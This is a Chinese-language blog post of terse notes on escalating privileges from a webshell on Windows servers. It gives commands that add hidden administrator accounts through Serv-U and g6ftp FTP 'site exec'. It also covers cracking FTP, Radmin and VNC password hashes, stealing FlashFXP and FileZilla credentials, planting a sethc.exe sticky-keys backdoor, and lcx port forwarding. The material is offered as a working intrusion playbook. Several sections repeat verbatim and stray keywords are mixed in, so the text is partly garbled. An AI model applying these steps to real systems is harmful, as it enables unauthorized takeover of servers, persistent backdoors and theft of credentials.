webshell提權筆記
阿新 • • 發佈:2018-07-22
密文 where 配置文件 連接 mini anywhere 建立 倒數 p地址 Server-u提交
有修改權限:
0檢查是否有可寫權限 修改server-u默認安裝目錄下的ServUDeamon.ini
添加新user用戶,給權限,密碼32位MD5加密,密碼前有2個字母,md5網站加密,復制其他用戶配置,粘貼,修改用戶名及密碼,加密時要加上前兩個字母
ftp ip地址 連接用戶
執行命令:
quote site exec net user 用戶名 密碼 .add
quote site exec net localgroup administrators 用戶名 /add
無修改權限:
讀取ServUDeamon.ini
拿到MD5加密的密碼,解密
純數字解密工具:
Serv-U純數字密碼破解器
字母解密工具:
passwordpro 右鍵 密碼復制進hash salt寫密文前兩個字母 選擇MD5(salt,pass)
倒數第三個選項,配置密碼組成方式 lcx
g6ftp server 連接
批處理建立超級管理員
上傳批處理
ftp執行批處理:quote site 批處理名字 找有殼讀寫權限文件夾,上傳lcx.exe
執行命令 lcx.exe路徑 -tran 轉發端口 目標ip 被轉發端口
有修改權限:
0檢查是否有可寫權限 修改server-u默認安裝目錄下的ServUDeamon.ini
添加新user用戶,給權限,密碼32位MD5加密,密碼前有2個字母,md5網站加密,復制其他用戶配置,粘貼,修改用戶名及密碼,加密時要加上前兩個字母
ftp ip地址 連接用戶
執行命令:
quote site exec net user 用戶名 密碼 .add
quote site exec net localgroup administrators 用戶名 /add
無修改權限:
讀取ServUDeamon.ini
拿到MD5加密的密碼,解密
純數字解密工具:
Serv-U純數字密碼破解器
passwordpro 右鍵 密碼復制進hash salt寫密文前兩個字母 選擇MD5(salt,pass)
倒數第三個選項,配置密碼組成方式
servuadmin扔進C32asm,十六進制打開,ctrl+f,搜索servu-提權顯示的用戶,ansi字符串搜索,.後面的為用戶密碼
pcanywhere提權
radmin hash需要轉換小寫
vcn密碼破解:
cmd運行 vncx4.exe -w
講大馬讀到的10進制數字轉為十六進制輸入
g6ftp提權
下載管理配置文件 administrator密碼破解 密碼為32位加密
默認只允許本機連接,需要lcx端口轉發
lcx.exe -tran 8027 127.0.0.1 8021
g6ftp server 連接
批處理建立超級管理員
上傳批處理
ftp執行批處理:quote site 批處理名字
flasFTP提權
下載目標flash安裝目錄flashFXP,找到quick.dat文件
本機安裝,替換,登錄
filezilla提權
filezillaserver.xml filezillaserver interface.xml 拿到管理信息
配置端口轉發,登錄ftp,創建ftp用戶,設置家目錄為C:\
cmd.exe改名sethc.exe(shift後門) 替換windows\system32\sethc.exe
連接3389 5次shift調出cmd.exe
端口轉發:
執行命令 lcx.exe路徑 -tran 轉發端口 目標ip 被轉發端口
0.0.0.0 代表任何一個地址
127.0.0.1 代表本機
安裝服務端,創建賬號,給路徑,權限
安裝客戶端連接21端口
pr/巴西烤肉提權
pr.exe "dos命令" 添加超級管理員
webshell提權筆記